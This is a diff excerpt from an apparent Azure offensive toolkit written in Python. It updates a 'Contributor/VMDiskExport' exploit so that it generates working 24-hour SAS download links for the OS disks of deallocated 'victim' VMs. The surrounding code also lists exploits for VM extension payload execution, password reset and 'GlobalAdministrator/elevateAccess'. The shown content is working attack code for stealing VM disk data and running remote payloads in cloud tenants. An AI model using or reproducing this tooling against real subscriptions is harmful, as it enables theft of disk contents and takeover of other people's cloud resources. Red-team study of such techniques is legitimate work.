| skipped 285 lines |
| 286 | 286 | | item['resourceGroup'] = res['name'] |
| 287 | 287 | | result.append(item) |
| 288 | 288 | | return result |
| 289 | | - | def CON_GenerateVMDiskSAS(subscriptionId, resourceGroupName, vmDiskName): |
| | 289 | + | def CON_GenerateVMDiskSAS(subscriptionId, resourceGroupName, vmDiskName, location): |
| 290 | 290 | | global Token |
| 291 | 291 | | headers = { |
| 292 | 292 | | 'Content-Type': 'application/json', |
| 293 | 293 | | 'Authorization': 'Bearer ' + Token |
| 294 | 294 | | } |
| 295 | | - | rs = requests.get("https://management.azure.com/subscriptions/"+subscriptionId+"/resourceGroups/"+resourceGroupName+"/providers/Microsoft.Compute/disks/"+vmDiskName+"/beginGetAccess?api-version=2021-12-01", |
| | 295 | + | rs = requests.post("https://management.azure.com/subscriptions/"+subscriptionId+"/resourceGroups/"+resourceGroupName+"/providers/Microsoft.Compute/disks/"+vmDiskName+"/beginGetAccess?api-version=2022-03-02", |
| 296 | 296 | | json={ |
| 297 | | - | "access": "Read", |
| 298 | | - | "durationInSeconds": 300 |
| | 297 | + | "access": "read", |
| | 298 | + | "durationInSeconds": 86400 |
| 299 | 299 | | }, |
| 300 | 300 | | headers=headers) |
| 301 | | - | if rs.status_code == 200: |
| 302 | | - | DownloadURL = rs.json()['access'] |
| 303 | | - | return "Ready! SAS Download Link for " + vmDiskName + ": " + DownloadURL |
| | 301 | + | |
| | 302 | + | if rs.status_code == 202: |
| | 303 | + | rsAsync = requests.get(str(rs.headers['Location']),headers=headers) |
| | 304 | + | return "Disk Ready! The SAS Download For the next 24 hours (Disk:" + vmDiskName + "): " + rsAsync.json()['accessSAS'] |
| 304 | 305 | | else: |
| 305 | | - | return "Unable to create SAS Download Link." |
| | 306 | + | return "Failed to generate SAS link for Disk." |
| 306 | 307 | | |
| 307 | 308 | | def CON_VMExtensionExecution(subscriptionId, location, resourceGroupName, vmName, PayloadURL): |
| 308 | 309 | | global Token |
| skipped 445 lines |
| 754 | 755 | | "Contributor/VMExtensionResetPwd", |
| 755 | 756 | | "Contributor/VMExtensionExecution", |
| 756 | 757 | | "Contributor/VMDiskExport", |
| 757 | | - | "Contributor/VMDiskSnapshotExport", |
| 758 | 758 | | "GlobalAdministrator/elevateAccess" |
| 759 | 759 | | ] |
| 760 | 760 | | readline.set_completer(SimpleCompleter(exploits).complete) |
| skipped 327 lines |
| 1088 | 1088 | | CmdFileContent = f.read() |
| 1089 | 1089 | | print(CON_VMRunCommand(victims[Selection]["subId"],victims[Selection]["rg"],victims[Selection]["os"],victims[Selection]["name"], CmdFileContent)) |
| 1090 | 1090 | | elif "Contributor/VMDiskExport" in ExploitChoosen and mode == "run": |
| 1091 | | - | print("Trying to list offline virtual machines.. (it might take a few minutes)") |
| | 1091 | + | print("Trying to list deallocated virtual machines.. (it might take a few minutes)") |
| 1092 | 1092 | | victims = {} |
| 1093 | 1093 | | AllVMRecords = PrettyTable() |
| 1094 | 1094 | | AllVMRecords.align = "l" |
| skipped 1 lines |
| 1096 | 1096 | | AllVMRecordsCount = 0 |
| 1097 | 1097 | | for UserVMRecord in RD_ListAllVMs(): |
| 1098 | 1098 | | VMState = HLP_GetVMInstanceView(UserVMRecord['subscriptionId'],UserVMRecord['resourceGroup'],UserVMRecord['name']) |
| | 1099 | + | if VMState != "PowerState/deallocated": |
| | 1100 | + | continue |
| 1099 | 1101 | | victims[AllVMRecordsCount] = {"name": UserVMRecord['name'], "location": UserVMRecord['location'], "diskName": UserVMRecord['properties']['storageProfile']['osDisk']['name'],"subId": UserVMRecord['subscriptionId'],"rg": UserVMRecord['resourceGroup']} |
| 1100 | 1102 | | AllVMRecords.add_row([AllVMRecordsCount, UserVMRecord['name'], UserVMRecord['location'], UserVMRecord['properties']['storageProfile']['osDisk']['name'], VMState]) |
| 1101 | 1103 | | AllVMRecordsCount += 1 |
| skipped 1 lines |
| 1103 | 1105 | | TargetVM = input("Select Target DiskVM [i.e. 1]: ") |
| 1104 | 1106 | | print("Create a SAS link for VHD download...") |
| 1105 | 1107 | | Selection = int(TargetVM) |
| 1106 | | - | print(CON_GenerateVMDiskSAS(victims[Selection]["subId"], victims[Selection]["rg"], victims[Selection]["diskName"])) |
| | 1108 | + | print(CON_GenerateVMDiskSAS(victims[Selection]["subId"], victims[Selection]["rg"], victims[Selection]["diskName"], victims[Selection]["location"])) |
| 1107 | 1109 | | |
| 1108 | 1110 | | elif "Contributor/VMExtensionExecution" in ExploitChoosen and mode == "run": |
| 1109 | 1111 | | print("Trying to list exposed virtual machines.. (it might take a few minutes)") |
| skipped 114 lines |
